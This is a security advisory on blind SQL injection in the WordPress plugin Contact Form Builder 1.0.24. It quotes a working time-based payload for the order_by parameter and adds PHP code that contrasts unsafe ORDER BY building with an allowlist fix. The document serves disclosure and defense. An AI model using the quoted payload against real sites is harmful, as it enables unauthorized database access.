Subject: Blind SQL injections in Contact Form Builder 1.0.24
Date: Tue, 7 Jul 2015 12:14:52 +0200
Plugin: Contact Form Builder 1.0.24
Authenticated administrators can execute arbitrary SQL commands; the affected requests also have no CSRF protection.
1. SQL injection (CFMModelBlocked_ips_cfm::get_rows_data())
Parameters: order_by, asc_or_desc
Example PHP callstack:
Parameter: order_by (POST)
Type: AND/OR time-based blind
Title: MySQL >= 5.0.12 AND time-based blind (SELECT)
Payload: order_by=ip AND (SELECT * FROM (SELECT(SLEEP(5)))sUkE)&asc_or_desc=asc
Please note that there has to be at least one record in the wp_contactformmaker_blocked table for the sqlmap payloads to execute successfully.
2. SQL injection (CFMModelManage_cfm::get_rows_data())
Analogous to SQL injection #1; both methods are almost identical.
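Both findings come down to the same defect: the order_by and asc_or_desc request parameters reach the ORDER BY clause unvalidated. The following is an added illustrative example written for this advisory; it is not code from the Contact Form Builder plugin, and the function names, the column allowlist and the sample request values are assumptions. It shows the unsafe concatenation pattern next to a hardened version that maps the two parameters onto a fixed allowlist, which is the right fix because $wpdb->prepare() can bind values but cannot parameterize identifiers or sort direction.

```php
<?php
// Added example (not the plugin's code). Demonstrates why raw order_by /
// asc_or_desc values must not be concatenated into ORDER BY, and how an
// allowlist reduces them to known identifiers. Runs with plain `php`.

/**
 * Unsafe pattern: request values are interpolated into the ORDER BY clause.
 * Whatever the client sends becomes part of the SQL text.
 */
function build_order_clause_unsafe(array $post): string
{
    $order_by    = $post['order_by']    ?? 'id';
    $asc_or_desc = $post['asc_or_desc'] ?? 'asc';
    return 'ORDER BY ' . $order_by . ' ' . $asc_or_desc;
}

/**
 * Hardened pattern: the column must be one of a fixed set of sortable
 * columns (assumed names below) and the direction is reduced to exactly
 * two literals. Anything unrecognised falls back to a safe default rather
 * than being passed through.
 */
function build_order_clause_safe(array $post, array $allowed_columns = ['id', 'ip', 'date_created']): string
{
    $column = $post['order_by'] ?? 'id';
    if (!in_array($column, $allowed_columns, true)) {
        $column = 'id';
    }
    $direction = strtolower((string) ($post['asc_or_desc'] ?? 'asc')) === 'desc' ? 'DESC' : 'ASC';
    // Backticks are safe here only because $column is a validated allowlist entry.
    return 'ORDER BY `' . $column . '` ' . $direction;
}

/**
 * In the WordPress context the validated fragment is then combined with
 * prepare() for any real values (e.g. LIMIT), and the handler should also
 * verify capability and nonce, which the advisory notes is missing:
 *
 *   if (!current_user_can('manage_options') || !check_admin_referer('cfm_blocked_ips')) {
 *       wp_die('Forbidden');
 *   }
 *   $sql = $wpdb->prepare(
 *       "SELECT * FROM {$wpdb->prefix}contactformmaker_blocked " . build_order_clause_safe($_POST) . " LIMIT %d",
 *       100
 *   );
 *   $rows = $wpdb->get_results($sql);
 */

// Constructed sample request, using the order_by value quoted in the advisory.
$sample_post = [
    'order_by'    => 'ip AND (SELECT * FROM (SELECT(SLEEP(5)))sUkE)',
    'asc_or_desc' => 'asc',
];

if (PHP_SAPI === 'cli') {
    echo "unsafe: " . build_order_clause_unsafe($sample_post) . PHP_EOL;
    // unsafe: ORDER BY ip AND (SELECT * FROM (SELECT(SLEEP(5)))sUkE) asc
    echo "safe:   " . build_order_clause_safe($sample_post) . PHP_EOL;
    // safe:   ORDER BY `id` ASC
}
```

Running the script shows the unsafe builder emitting the injected expression verbatim, while the hardened builder silently falls back to `ORDER BY \`id\` ASC` because the supplied column is not on the allowlist. On the detection side, the same allowlist makes a useful log check: any order_by value that is not one of the expected column names in admin-ajax or plugin page requests is worth alerting on.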